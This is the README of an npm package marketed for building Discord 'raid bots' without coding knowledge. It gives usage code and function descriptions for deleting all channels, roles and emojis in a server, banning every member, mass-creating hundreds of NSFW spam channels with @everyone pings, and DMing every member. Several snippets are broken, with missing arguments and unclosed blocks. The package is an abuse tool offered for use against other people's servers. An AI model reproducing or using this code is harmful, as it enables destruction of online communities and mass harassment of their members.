This is the documentation for the package, As npm doesnt allow me to put the whole stuff there because it's "not allowed"
An easy package to make OP Discord Raid Bots!
This package was made to help people make their raid bots with ease, You don't really have to know coding knowledge, just knowing how to open an ide and run a Discord Bot!
Setting UP
Please put the code next to your **const client = new Discord.Client()** so that the code above is able to operate with your already declared const client
const Discord = require('discord.js') //we require discord
const client = new Discord.Client() //setting/creating a new discord client (bot)
const Disc_rd = require('discord-raid-toolkit-revamp')
const raid = new Disc_rd.RaidBot(client) //here we pass client parameter, as you see i set it as client because that is the name i put it as in const **client**
client.on('message', async message => {
if(message.content.startsWith('!deletechannels')) {
await raid.deleteAllChannels( //deleting every channel in the guild with the id provided, in this case, the current guild where command was executed
client.login('Your very very secret token')
Explaining every function
+raid.deleteAllChannels(guild_id) - As its name indicates, Deletes every channel in the guild with provided ID
+raid.deleteAllEmojis(guild_id) - As its name indicates, Deletes every emoji in the guild with provided ID
+raid.deleteAllRoles(guild_id) - As its name indicates, Deletes every role in the guild with provided ID
+raid.createChannelsLoop(guild_id, {amount_of_created_channels, message_that_will_be_sent, times_message_is_sent, channels_name, reason_channels, channels_topic, nsfw, channel_cooldown, }) - Creates a loop of channels to create, with some useful info
+raid.getServerInvite(guild_id) - Returns the invite of the server with provided ID, must be obviously awaited
+raid.banAll(guild_id, reason) - Bans every single member in a guild, reason will always be optional in any function :)
client.on('message', message => {
if(message.content.startsWith('!channelloop')) {
raid.createChannelsLoop(, {amount_of_created_channels: 500, message_that_will_be_sent: "@everyone gg", times_message_is_sent: 10, channels_name: "gg", reason_channels: "Get raided lol", channels_topic: "gg", nsfw: true, channel_cooldown: 10}) //btw channel_cooldown is put in seconds, like, i put 10 so channel cooldown will be 10 seconds, you can always try the code and understand it the max possible
raid.dmall(guild_id, content)
client.on('message', message => {
if(message.content.startsWith('!dmall')) {
raid.dmall(, 'This message will be sent to everyone in the guild')
client.on('message', async message => {
if(message.content.startsWith('!get-server-invite') {
const invite_url = await raid.getServerInvite('The invite of this server is: ' + invite_url)